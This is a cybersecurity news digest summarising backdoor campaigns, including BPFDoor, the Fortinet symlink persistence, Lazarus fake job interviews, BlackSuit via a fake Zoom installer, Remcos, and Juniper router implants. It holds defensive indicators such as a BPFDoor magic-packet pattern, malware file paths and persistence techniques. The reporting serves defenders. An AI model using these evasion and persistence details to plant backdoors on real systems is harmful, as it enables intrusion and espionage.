CyberSecurity news

FlagThis - #backdoor

Anna Ribeiro@Industrial Cyber //
Trend Micro researchers have uncovered a novel controller linked to the BPFDoor backdoor, enabling stealthy reverse shell attacks on Linux servers across Asia and the Middle East. This previously unseen controller is attributed to the Red Menshen advanced persistent threat (APT) group, tracked by Trend Micro as Earth Bluecrow. The attacks, observed in the telecommunications, finance, and retail sectors, have been documented in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt. This discovery highlights the ongoing cyberespionage activities leveraging sophisticated and evasive techniques to compromise Linux systems.

The controller's primary function is to open a reverse shell on compromised systems, which allows attackers to move laterally within the network, control additional systems, and access sensitive data. BPFDoor uses the packet filtering features of Berkeley Packet Filtering (BPF) to inspect network packets, using "magic sequences" to activate the backdoor. This method allows BPFDoor to evade traditional security measures, making it a perfect tool for long-term espionage, as casual security sweeps won’t detect anything unusual. The malware can also change process names and does not listen to any port, further masking its presence.

Trend Micro's investigation indicates that BPFDoor has been active since at least 2021, with consistent campaigns targeting Linux servers across multiple industries. The attackers are known to hide malware in non-standard paths, such as /tmp/zabbix_agent.log or /bin/vmtoolsdsrv. Defenders are advised to monitor for TCP packets starting with 0x5293, followed by IP:port and password and UDP/ICMP packets. While static indicators are unreliable due to customizable magic packets and varying passwords, proactive network monitoring and analysis of BPF code are crucial for protecting organizations against BPF-powered threats.

Recommended read:
References :
  • securityonline.info: BPFDoor Backdoor Used in Asia, Middle East Cyberespionage
  • Virus Bulletin: Trend Micro's Fernando Mercês writes about BPFDoor, a state-sponsored backdoor designed for cyberespionage activities targeting the telecommunications, finance and retail sectors across South Korea, Hong Kong, Myanmar, Malaysia and Egypt.
  • www.trendmicro.com: BPFDoor’s new hidden controller emerges! Attackers can open reverse shells or direct port for stealth access on Linux servers.
  • gbhackers.com: A new wave of cyber espionage attacks has brought BPFDoor malware into the spotlight as a stealthy and dangerous tool for compromising networks.
  • Cyber Security News: CybersecurityNews: Stealthy Rootkit-Like Malware Known as BPFDoor Using Reverse Shell to Dig Deeper into Compromised Networks
  • gbhackers.com: GBHackers: BPFDoor Malware Uses Reverse Shell to Expand Control Over Compromised Networks
  • Industrial Cyber: Trend Micro details BPFDoor controller used in stealthy reverse shell attacks on telecom, finance, and retail
  • www.scworld.com: Novel BPFDoor backdoor component facilitates covert attacks
  • Security Risk Advisors: 🚩 BPFDoor’s Hidden Controller Enables Stealthy Lateral Movement in Linux Server Attacks
  • industrialcyber.co: Trend Micro details BPFDoor controller used in stealthy reverse shell attacks on telecom, finance, and retail
  • sra.io: BPFDoor’s Hidden Controller Enables Stealthy Lateral Movement in Linux Server Attacks
  • The Hacker News: New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks
  • The Hacker News: New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks

@www.bleepingcomputer.com //
Over 16,000 Fortinet devices have been compromised due to a novel symlink backdoor, allowing attackers to maintain read-only access to sensitive files. This was reported by The Shadowserver Foundation. The attackers are exploiting known vulnerabilities in FortiGate devices, specifically targeting the SSL-VPN language file directory. By creating a symbolic link between the user filesystem and the root filesystem, attackers can bypass security measures and access critical files even after patches are applied.

Researchers observed that threat actors are leveraging a new method to exploit previously patched vulnerabilities in Fortinet's FortiOS, specifically targeting FortiGate VPN appliances. The original flaw, CVE-2023-27997, had a fix issued, but threat actors can still gain access by manipulating symbolic links during the device's boot process. This enables threat actors with prior access to maintain control over the device, even after firmware updates. The issue stems from how FortiOS handles file permissions and symlinks when restarting, allowing malicious files to persist and re-enable vulnerabilities that were supposedly fixed.

Fortinet has responded by releasing several updates and new security measures to block further attacks. These measures include launching an internal investigation, coordinating with third-party experts, and developing an AV/IPS signature to detect and remove the symbolic link automatically. Multiple updates have been issued across different FortiOS versions, including 7.6.2, 7.4.7, 7.2.11, 7.0.17, and 6.4.16. These updates not only remove the backdoor but also modify the SSL-VPN interface to prevent future occurrences. Organizations are urged to upgrade to the latest secure versions to mitigate the risk.

Recommended read:
References :
  • www.cybersecuritydive.com: Fortinet warns of threat activity against older vulnerabilities
  • thehackernews.com: The Hacker News article on Fortinet Warns Attackers Retain FortiGate Access Post-Patching via SSL-VPN Symlink Exploit
  • community.fortinet.com: Technical Tip : Recommended steps to execute in case of a compromise
  • BleepingComputer: Fortinet warns that threat actors use a post-exploitation technique
  • BleepingComputer: Fortinet: Hackers retain access to patched FortiGate VPNs using symlinks
  • Help Net Security: HelpNetSecurity: FortiOS, FortiGate vulnerabilities
  • bsky.app: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
  • www.helpnetsecurity.com: Hackers exploit old FortiGate vulnerabilities, use symlink trick to retain limited access to patched devices
  • www.bleepingcomputer.com: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
  • securityaffairs.com: Fortinet warns attackers can keep read-only access to FortiGate devices even after the original vulnerability is patched.
  • bsky.app: Fortinet has urged customers to install a recent FortiGate firmware update that mitigates a new technique abused in the wild. The technique allows attackers to maintain read-only access to FortiGate devices they previously infected.
  • www.scworld.com: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
  • securityaffairs.com: Fortinet warns attackers can keep read-only access to FortiGate devices even after the original vulnerability is patched.
  • hackread.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
  • www.scworld.com: SCWorld brief on Fortinet FortiGate fixes circumvented by symlink exploit
  • The Register - Security: Old Fortinet flaws under attack with new method its patch didn't prevent
  • MSSP feed for Latest: Fortinet Finds Attackers Maintain Access Post-Patch via SSL-VPN Symlink Exploit Fortinet Finds Attackers Maintain Access Post-Patch via SSL-VPN Symlink Exploit
  • hackread.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
  • securityonline.info: Fortinet Uncovers Threat Actor Persistence via Symbolic Link Exploit in FortiGate Devices
  • ciso2ciso.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
  • securityonline.info: Fortinet Uncovers Threat Actor Persistence via Symbolic Link Exploit in FortiGate Devices
  • ciso2ciso.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access – Source:hackread.com
  • Blog: Threat actors have been observed leveraging a new method to exploit a previously patched vulnerability in Fortinet’s FortiOS operating system—specifically targeting FortiGate VPN appliances. Although Fortinet issued a fix for the original flaw (CVE-2023-27997), researchers found that threat actors can still gain access by manipulating symbolic links (symlinks) during the device’s boot process.
  • BleepingComputer: Over 16,000 internet-exposed Fortinet devices have been detected as compromised with a new symlink backdoor that allows read-only access to sensitive files on previously compromised devices.
  • bsky.app: Over 16,000 internet-exposed Fortinet devices have been detected as compromised with a new symlink backdoor that allows read-only access to sensitive files on previously compromised devices.
  • www.bleepingcomputer.com: Over 16,000 Fortinet devices compromised with symlink backdoor
  • The DefendOps Diaries: Fortinet Devices Under Siege: Understanding the Symlink Backdoor Threat
  • www.cybersecuritydive.com: Over 14K Fortinet devices compromised via new attack method

do son@securityonline.info //
A new "ClickFake Interview" campaign, attributed to the Lazarus Group, is targeting professionals in the cryptocurrency sector with fraudulent job offers. Security researchers at Sekoia discovered the operation, revealing that threat actors impersonate recruiters on platforms like LinkedIn and X (formerly Twitter) to lure victims into fake job interviews. These interviews are designed to trick candidates into opening malicious documents or clicking on compromised links, ultimately leading to malware infection and potential data theft.

The malware, dubbed "ClickFix" or sometimes distributed through the GolangGhost backdoor, grants attackers remote access to compromised systems. This allows the Lazarus Group to steal sensitive information, including cryptocurrency wallet credentials, execute arbitrary commands, and maintain persistent access. Sekoia warns that this campaign reflects a new Lazarus strategy targeting cryptocurrency industry employees, even those with limited technical expertise, making them less likely to detect malicious activity during the interview process. Professionals are advised to verify recruiter identities, avoid downloading files from unknown sources, and utilize endpoint protection to mitigate risks.

Recommended read:
References :
  • : New “ClickFake Interview” campaign attributed to the Lazarus Group targets crypto professionals with fake job offers
  • www.scworld.com: ClickFix technique leveraged in new crypto-targeted Lazarus attacks
  • Virus Bulletin: Sekoya researchers discovered a ClickFake Interview campaign targeting job seekers with fake job interview websites. The infrastructure aligns with technical indicators linked to the Contagious Interview campaign and delivers GolangGhost backdoor for Windows & macOS
  • Security Risk Advisors: Lazarus Uses “ClickFake Interviewâ€� to Distribute Backdoors via Fake Crypto Job Websites
  • The Hacker News: Lazarus Group Targets Job Seekers With ClickFix Tactic to Deploy GolangGhost Malware

do son@securityonline.info //
Cybersecurity analysts have uncovered a sophisticated campaign exploiting a fake Zoom installer to deliver BlackSuit ransomware across Windows-based systems. The attack, beginning with a malicious download from a website mimicking the teleconferencing application Zoom, lures unsuspecting victims into installing malware capable of crippling entire networks. When the victim clicked the “Download” button, they unknowingly triggered a chain reaction of events.

The fake installer, crafted with Inno Setup, hides the d3f@ckloader, a Pascal-based loader. After gaining initial access, the attackers deploy Brute Ratel and Cobalt Strike for lateral movement, using QDoor to facilitate RDP access. After 9 days, they deploy the BlackSuit ransomware across the network, deleting Volume Shadow Copies to hinder data recovery efforts before encrypting files and dropping ransom notes. The attackers also used WinRAR to compress file share data and uploaded the archives to Bublup, a cloud storage service for data exfiltration.

Recommended read:
References :
  • bsky.app: The notorious North Korean Lazarus hacking group has reportedly adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi).
  • BleepingComputer: North Korean hackers adopt ClickFix attacks to target crypto firms
  • Cyber Security News: Hackers Exploit Zoom Installer to Gain RDP Access and Launch BlackSuit Ransomware Attack
  • gbhackers.com: Beware! A Fake Zoom Installer Drops BlackSuit Ransomware on Your Windows Systems
  • Virus Bulletin: The DFIR Report researchers look into a fake Zoom installer that used d3f@ckloader & IDAT loader to drop SectopRAT, which dropped Cobalt Strike & Brute Ratel after 9 days. For later movement the threat actor used QDoor & finally deployed BlackSuit ransomware.
  • Osint10x: Fake Zoom Ends in BlackSuit Ransomware
  • securityonline.info: Fake Zoom, Real Ransom: Nine-Day Malware Intrusion Ends with BlackSuit Ransomware Blast
  • bsky.app: Lazarus adopts ClickFix technique.
  • : New “ClickFake Interview†campaign attributed to the Lazarus Group targets crypto professionals with fake job offers
  • BleepingComputer: Report of the Lazarus Group adopting the ClickFix technique for malware deployment.

Pierluigi Paganini@Security Affairs //
Russia-linked Gamaredon is actively targeting Ukrainian users with a phishing campaign designed to deploy the Remcos Remote Access Trojan (RAT). This ongoing cyber campaign, uncovered by Cisco Talos, utilizes malicious LNK files disguised as Microsoft Office documents within ZIP archives. The filenames of these files often reference troop movements and other sensitive geopolitical themes related to the conflict in Ukraine, demonstrating a deliberate attempt to exploit the current situation to lure victims.

The attack chain begins with the execution of a PowerShell downloader embedded within the LNK file. This downloader then contacts geo-fenced servers located in Russia and Germany to retrieve a second-stage ZIP payload that contains the Remcos backdoor. The downloaded payload employs DLL sideloading techniques to execute the backdoor. Cisco Talos assesses that the threat actor, Gamaredon, is affiliated with Russia's Federal Security Service (FSB) and known for targeting Ukrainian organizations for espionage and data theft since at least 2013.

Recommended read:
References :
  • Cisco Talos Blog: Cisco Talos is actively tracking an ongoing campaign, targeting users in Ukraine with malicious LNK files which run a PowerShell downloader since at least November 2024.
  • Cyber Security News: A sophisticated cyber espionage campaign targeting Ukrainian entities has been uncovered, revealing the latest tactics of the Russia-linked Gamaredon threat actor group.
  • Christoffer S.: Gamaredon APT Targets Ukraine with Remcos Backdoor Using War-Themed Lures Cisco Talos is tracking a campaign targeting Ukrainian users with malicious LNK files that deliver the Remcos backdoor.
  • gbhackers.com: Cisco Talos has uncovered an ongoing cyber campaign by the Gamaredon threat actor group, targeting Ukrainian users with malicious LNK files to deliver the Remcos backdoor.
  • buherator's timeline: Cisco Talos is tracking a campaign targeting Ukrainian users with malicious LNK files that deliver the Remcos backdoor. The campaign, attributed with medium confidence to the Gamaredon APT group, uses Russian-language lures related to troop movements in Ukraine.
  • securityonline.info: A new targeted malware campaign linked to the Russian state-aligned group Gamaredon is exploiting Windows shortcut (.LNK) files
  • The Hacker News: Entities in Ukraine have been targeted as part of a phishing campaign designed to distribute a remote access trojan called Remcos RAT. "The file names use Russian words related to the movement of troops in Ukraine as a lure," Cisco Talos researcher Guilherme Venere said in a report published last week. "The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to
  • securityaffairs.com: Russia-Linked Gamaredon Uses Troop-Related Lures to Deploy Remcos RAT in Ukraine
  • Virus Bulletin: Cisco Talos researcher Guilherme Venere analyses an ongoing campaign targeting users in Ukraine with malicious LNK files which run a PowerShell downloader. The downloader contacts geo-fenced servers located in Russia & Germany to deploy the second stage Zip file containing the Remcos backdoor.
  • OODAloop: Entities in Ukraine have been targeted as part of a phishing campaign designed to distribute a remote access trojan called Remcos RAT. The activity has been attributed with moderate confidence to a Russian hacking group known as Gamaredon.
  • Vulnerable U: Russian Hackers Target Ukraine With Stealthy Malware Attack
  • Cisco Talos Blog: Talos researchers warn that Russia-linked APT group Gamaredon targets Ukraine with a phishing campaign.
  • securityaffairs.com: Russia-linked Gamaredon targets Ukraine with a phishing campaign using troop-related lures to deploy the Remcos RAT via PowerShell downloader.
  • www.scworld.com: Ongoing Gamaredon phishing campaign targets Ukraine with Remcos RAT
  • securityaffairs.com: Russia-linked Gamaredon targets Ukraine with a phishing campaign using troop-related lures to deploy the Remcos RAT via PowerShell downloader.
  • Virus Bulletin: Cisco Talos researcher Guilherme Venere analyses an ongoing campaign targeting users in Ukraine with malicious LNK files which run a PowerShell downloader.
  • Industrial Cyber: Russian-linked UAC-0219 group escalates attacks on Ukraine government, critical infrastructure
  • The Hacker News: CERT-UA Reports Cyberattacks Targeting Ukrainian State Systems with WRECKSTEEL Malware
  • SOC Prime Blog: UAC-0219 Attack Detection: A New Cyber-Espionage Campaign Using a PowerShell Stealer WRECKSTEEL

Waqas@hackread.com //
Chinese cyber espionage group UNC3886 has been targeting Juniper Networks Junos OS MX routers that have reached their end-of-life. Researchers at Mandiant uncovered the attacks, which began in mid-2024, revealing that the group deployed custom backdoors to compromise these outdated systems. These backdoors allowed the attackers to bypass file integrity protections and maintain persistence, enabling them to steal data and conduct espionage.

Mandiant's investigation showed that UNC3886 exploited vulnerabilities in Junos OS, overcoming its protection subsystem, Veriexec, through a technique called process injection. The attackers injected malicious code into legitimate processes by gaining privileged access to a Juniper router from a terminal server using legitimate credentials. Juniper Networks and Mandiant recommend that organizations using these routers immediately upgrade their devices and run an integrity checker to confirm their systems are secure.

Recommended read:
References :
  • hackread.com: Chinese Cyber Espionage Group UNC3886 Backdoored Juniper Routers
  • www.cybersecuritydive.com: Juniper MX routers targeted by China-nexus threat group using custom backdoors
  • : Chinese Hackers Implant Backdoor Malware on Juniper Routers
  • BleepingComputer: Chinese hackers are deploying custom backdoors on Juniper Networks  Junos OS MX routers that have reached end-of-life (EoL) and no longer receive security updates.
  • www.csoonline.com: Chinese cyberespionage group deploys custom backdoors on Juniper routers
  • thehackernews.com: Chinese Hackers Breach Juniper Networks Routers With Custom Backdoors and Rootkits
  • The Register - Security: Expired Juniper routers find new life – as Chinese spy hubs
  • Cybernews: Chinese cyberespionage group is targeting Juniper routers with custom backdoors for outdated hardware.
  • BleepingComputer: Chinese hackers are deploying custom backdoors on Juniper Networks Junos OS MX routers that have reached end-of-life (EoL) and no longer receive security updates.
  • The DefendOps Diaries: Chinese Cyberspies Exploit Juniper Routers: A Deep Dive into Advanced Threats
  • Industrial Cyber: Mandiant uncovers custom backdoors on Juniper Junos OS routers, linked to Chinese espionage group UNC3886
  • The Record: Researchers said the Chinese state-backed group dubbed UNC3886 was behind a campaign to deploy custom backdoors on Juniper's Junos OS routers
  • securityaffairs.com: China-linked APT UNC3886 targets EoL Juniper routers
  • Security Risk Advisors: China-linked UNC3886 deploying custom backdoors on Juniper routers. Upgrade devices, run JMRT scans, implement MFA for network device management.
  • BleepingComputer: ​Juniper Networks has released emergency security updates to patch a Junos OS vulnerability exploited by Chinese hackers to backdoor routers for stealthy access.
  • securityaffairs.com: Researchers from Mandiant identified that threat actors have been deploying custom backdoors on Juniper Networks’ Junos OS routers. The group known as UNC3886, targeted critical infrastructure sectors.
  • Information Security Buzz: Google Uncovers China-Linked Espionage Campaign Targeting Juniper Routers
  • Virus Bulletin: Mandiant researchers describe UNC3886’s TTPs, and their focus on malware & capabilities that enable them to operate on network & edge devices that usually lack security monitoring & detection solutions. The espionage group targets Juniper routers with TINYSHELL-based backdoors.
  • securityaffairs.com: Mandiant researchers warn that China-linked actors are deploying custom backdoors on Juniper Networks Junos OS MX routers.
  • bsky.app: Juniper Networks has released emergency security updates to patch a Junos OS vulnerability exploited by Chinese hackers to backdoor routers for stealthy access. [...]
  • bsky.app: Juniper Networks has released emergency security updates to patch a Junos OS vulnerability exploited by Chinese hackers to backdoor routers for stealthy access.
  • Blog: China-linked threat actor deploys backdoors, rootkits on Junos OS routers
  • www.it-daily.net: Chinese espionage on old Juniper routers
  • www.scworld.com: Old Juniper routers targeted by Chinese hackers to deploy various payloads
  • www.techradar.com: Chinese hackers targeting Juniper Networks routers, so patch now
  • Rescana: Rescana Cybersecurity Report: Exploitation in the Wild of CVE-2025-21590
  • bsky.app: Description of Chinese hackers deploying custom backdoors on Juniper routers.
  • www.cysecurity.news: China-linked APT UNC3886 targets EoL Juniper routers
  • : Mandiant researchers warn that China-linked actors are deploying custom backdoors on Juniper Networks Junos OS MX routers.
  • securityonline.info: Security Advisory: Juniper Issues Urgent Fix for Actively Exploited Junos OS Flaw – CVE-2025-21590
  • iHLS: Chinese Cyberespionage Group Targets Defense and Technology Organizations’ Routers
  • www.techradar.com: Juniper patches security flaws which could have let hackers take over your router
  • www.scworld.com: Actively exploited Juniper router vulnerability addressed
  • www.scworld.com: The threat actor (UNC3886) was found to be targeting end-of-life Juniper Networks routers.
  • aboutdfir.com: InfoSec News Nuggets 3/17/2025 discusses a state-backed group from China targeting Juniper Networks routers with custom backdoors.
  • ASEC: A report on the deep web and dark web from February 2025 notes the espionage group UNC3886 operating out of China targeting routers made by Juniper Networks.

Veronika Telychko@SOC Prime Blog //
An undocumented "backdoor," which is really undocumented commands, has been discovered in the ESP32 microchip, a product of the Chinese manufacturer Espressif. This chip is a cornerstone in the Internet of Things (IoT) ecosystem, providing essential Bluetooth and Wi-Fi connectivity. It is widely used in over a billion devices as of 2023. The "backdoor," as it is referred to, could be leveraged for attacks including spoofing trusted devices, unauthorized data access, and pivoting to other devices on the network.

This discovery was made by Spanish researchers Miguel Tarascó Acuña and Antonio Vázquez Blanco from Tarlogic Security, who presented their findings at RootedCON. Their research underscores the critical need for robust security measures in IoT devices. The potential impact could be extensive, considering the chip’s widespread usage. This discovery raises concerns about the security of numerous devices and systems that rely on the ESP32 for their operations.

Recommended read:
References :
  • infosec.exchange: Ok, poll for the "supply chain risk management" people! There's a backdoor in the ESP32 wifi/bluetooth chip.
  • Anonymous ???????? :af:: The ubiquitous microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains an undocumented "backdoor" that could be leveraged for attacks.
  • The DefendOps Diaries: Discover the ESP32 backdoor's impact on IoT security and the urgent need for robust protection measures.
  • www.bleepingcomputer.com: The ubiquitous ESP32 microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains an undocumented "backdoor" that could be leveraged for attacks.
  • BleepingComputer: Infosec.Exchange post about ESP32 Microchip Backdoor
  • BleepingComputer: Infosec.Exchange post about ESP32 microchip with undocumented backdoor.
  • Jon Greig: IOC.Exchange post about the backdoor
  • TARNKAPPE.INFO: Bluetooth-Chip-Backdoor entdeckt: Über 1 Mrd. Geräte betroffen
  • Rescana: Unveiling the ESP32 Bluetooth Chip Backdoor: Security Vulnerabilities and Mitigation Strategies
  • BleepingComputer: The ubiquitous ESP32 microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains undocumented commands that could be leveraged for attacks.
  • dragosr: Oh, is that all? A few (billion?) ESP32 devices let attackers establish persistency in local flash using an undocumented commands set accessible from an over the air pivot, and low level protocol injection and spoofing control...
  • securityaffairs.com: Undocumented hidden feature found in Espressif ESP32 microchip
  • BleepingComputer: The ubiquitous ESP32 microchip made by Chinese manufacturer Espressif and used by over 1 billion units as of 2023 contains an undocumented "backdoor" that could be leveraged for attacks.
  • Davey Winder: Identity Theft Warning—Hidden Commands In 1 Billion Bluetooth Chips
  • www.techradar.com: Top Bluetooth chip security flaw could put a billion devices at risk worldwide
  • Security | TechRepublic: Researchers warn these commands could be exploited to manipulate memory, impersonate devices, and bypass security controls.
  • BetaNews: Attackers can use undocumented commands to hijack Chinese-made Bluetooth chips
  • CyberInsider: Hidden Commands Discovered in Bluetooth Chip Used in a Billion Devices
  • bsky.app: Undocumented "backdoor" found in Bluetooth chip used by a billion devices
  • Matthew Rosenquist: The recent undocumented code in the ESP32 microchip, made by Chinese manufacturer Espressif Systems, is used in over 1 billion devices and could represent a cybersecurity risk.
  • SOC Prime Blog: CVE-2025-27840: Vulnerability Exploitation in Espressif ESP32 Bluetooth Chips Can Lead to Unauthorized Access to Devices

@Talkback Resources //
Cybersecurity researchers have unveiled advanced obfuscation tactics employed by APT28, a Russian state-sponsored threat actor, in their HTA Trojan. The investigation focuses on espionage campaigns targeting Central Asia and Kazakhstan diplomatic relations, revealing intricate multi-layer obfuscation strategies designed to evade detection. The analysis highlights the use of Microsoft’s VBE technique within HTA files as a core component of APT28’s malware delivery mechanism. This encoding method, facilitated by the Windows Script Encoder, transforms VBScript and JavaScript files into obfuscated formats that remain executable while concealing their true functionality.

The investigation uncovered that the malware leverages Windows’ vbscript.dll to generate embedded strings dynamically during execution. By analyzing these strings and their interaction with memory addresses, researchers were able to reconstruct the original VBScript payload hidden within the HTA file. Using publicly available tools like “vbe-decoder.py,” they successfully deobfuscated the encoded scripts, exposing the final malicious payload designed for espionage activities. This discovery underscores the need for robust malware analysis capabilities and proactive threat intelligence sharing within the cybersecurity community.

Recommended read:
References :
  • Virus Bulletin: Cisco Talos researcher Joey Chen describes how Lotus Blossom uses Sagerunex and other hacking tools for post-compromise activities. The espionage operation targets government, manufacturing, telecommunications & media organizations from Philippines, Vietnam, Hong Kong & Taiwan.
  • gbhackers.com: Lotus Blossom Hacker Group Uses Dropbox, Twitter, and Zimbra for C2 Communications
  • Talkback Resources: Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools
  • www.cysecurity.news: Cisco Talos Uncovers Lotus Blossom’s Multi-Campaign Cyber Espionage Operations
  • Cyber Security News: Researchers Unveil APT28’s Advanced HTA Trojan Obfuscation Tactics in Detail
  • gbhackers.com: Researchers Unveil APT28’s Advanced HTA Trojan Obfuscation Tactics
  • securityaffairs.com: Chinese Lotus Blossom APT targets multiple sectors with Sagerunex backdoor

Field Effect@Blog //
A new Linux malware strain, dubbed Auto-Color, has been identified by Palo Alto Networks, targeting universities and government organizations across North America and Asia. This previously undocumented backdoor employs advanced stealth tactics to evade detection and maintain persistence on compromised systems. The method used to originally deliver Auto-Color is currently unknown, however researchers have observed that it's often executed with unassuming file names like "door," "egg," or "log."

Once executed, Auto-Color installs a malicious library named libcext.so.2, disguised as the legitimate libcext.so.0 library, and copies itself to the /var/log/cross/auto-color system directory. If running with root privileges, the malware modifies the '/etc/ld.preload' file to achieve persistence. If not running with root privileges, it skips this step. Auto-Color grants malicious actors full remote access to compromised machines, making removal exceptionally difficult without specialized tools.

Recommended read:
References :
  • Blog: Linux Systems Threated by New ‘Auto-Color’ Backdoor
  • Information Security Buzz: ‘Auto-Color’ Linux Malware Uses Advanced Stealth Tactics to Evade Detection
  • The Hacker News: New Linux Malware ‘Auto-Color’ Grants Hackers Full Remote Access to Compromised Systems

info@thehackernews.com (The Hacker News)@The Hacker News //
A new Golang-based backdoor has been discovered that leverages the Telegram Bot API for command-and-control (C2) communications. Cybersecurity researchers at Netskope Threat Labs detailed the malware, suggesting it may be of Russian origin. According to security researcher Leandro Fróes, the malware, while seemingly still under development, is fully functional and acts as a backdoor once executed. The backdoor utilizes an open-source library offering Golang bindings for the Telegram Bot API.

Once launched, the malware checks if it’s running under a specific location and name ("C:\Windows\Temp\svchost.exe"). If not, it copies itself to that location and creates a new process. The backdoor interacts with the Telegram Bot API to receive commands from an attacker-controlled chat, supporting commands to execute PowerShell commands, relaunch itself, and self-destruct. Though not fully fleshed out, a screenshot command is also present.

Netskope highlights the use of cloud applications like Telegram presents a challenge for defenders, as attackers exploit the ease of use and setup these apps provide during various attack phases. The use of the Russian language in the "/cmd" instruction, which sends the message "Enter the command:" in Russian, further supports the assessment of potential Russian origin. This malware uses Telegram for C2, and has the capability of executing PowerShell commands and self-destructing to evade detection.

Recommended read:
References :
  • ciso2ciso.com: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations – Source:thehackernews.com
  • securityaffairs.com: New Golang-based backdoor relies on Telegram for C2 communication
  • Talkback Resources: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations [mal]
  • The Hacker News: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations
  • ciso2ciso.com: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations – Source:thehackernews.com
  • hackread.com: Hackers Exploit Telegram API to Spread New Golang Backdoor with Russian Connection
  • Talkback Resources: New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations
  • securityonline.info: A new Golang-based backdoor, potentially of Russian origin, uses Telegram for C2 communication, exploiting cloud apps for enhanced stealth.
  • Talkback Resources: Talkback.sh article summarizing a new Golang-based backdoor using Telegram Bot API for evasive C2 operations.
  • www.scworld.com: Telegram API exploited by new Golang backdoor
  • Security Risk Advisors: New #Golang backdoor abuses #Telegram Bot API for stealthy remote commands and self-destruct. The post appeared first on .
  • securityonline.info: Security researchers at Netskope Threat Labs have uncovered a new backdoor malware written in Golang that leverages Telegram The post appeared first on .
  • Threat Labs - Netskope: 🚩Golang Malware Uses Telegram Bot API for Stealthy Remote Commands and Data Exfiltration
  • www.csoonline.com: Russian malware discovered with Telegram hacks for C2 operations

@www.bleepingcomputer.com //
Hackers are actively exploiting vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) software to compromise systems and potentially deploy ransomware. Cybersecurity firm Field Effect has confirmed these exploits and released a report detailing the post-exploitation activity. The vulnerabilities, tracked as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, allow attackers to create administrator accounts and drop backdoors, laying the groundwork for further malicious activities.

Field Effect identified a breach where threat actors exploited these vulnerabilities in the SimpleHelp RMM client to infiltrate a targeted network. Following initial access, attackers execute discovery commands to gather system and network data. They then establish persistence by creating new administrator accounts and deploying the Sliver malware, a post-exploitation framework gaining popularity as a Cobalt Strike alternative. Once deployed, Sliver waits for further commands, enabling attackers to compromise the domain controller and potentially distribute malicious software.

Recommended read:
References :
  • Security Risk Advisors: Threat Actors Exploit SimpleHelp RMM Vulnerabilities to Deploy Ransomware
  • The Hacker News: The Hacker News - Hackers Exploiting SimpleHelp RMM Flaws for Persistent Access and Ransomware
  • www.bleepingcomputer.com: Hackers are targeting vulnerable SimpleHelp RMM clients to create administrator accounts, drop backdoors, and potentially lay the groundwork for ransomware attacks.
  • Blog: Threat actors exploiting #SimpleHelp RMM #vulnerabilities to deploy #ransomware The post appeared first on .
  • www.scworld.com: Sliver malware spread via SimpleHelp RMM exploits
  • fieldeffect.com: Threat actors exploiting #SimpleHelp RMM #vulnerabilities to deploy #ransomware
  • gbhackers.com: Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems
  • gbhackers.com: Hackers Exploiting SimpleHelp Vulnerabilities to Deploy Malware on Systems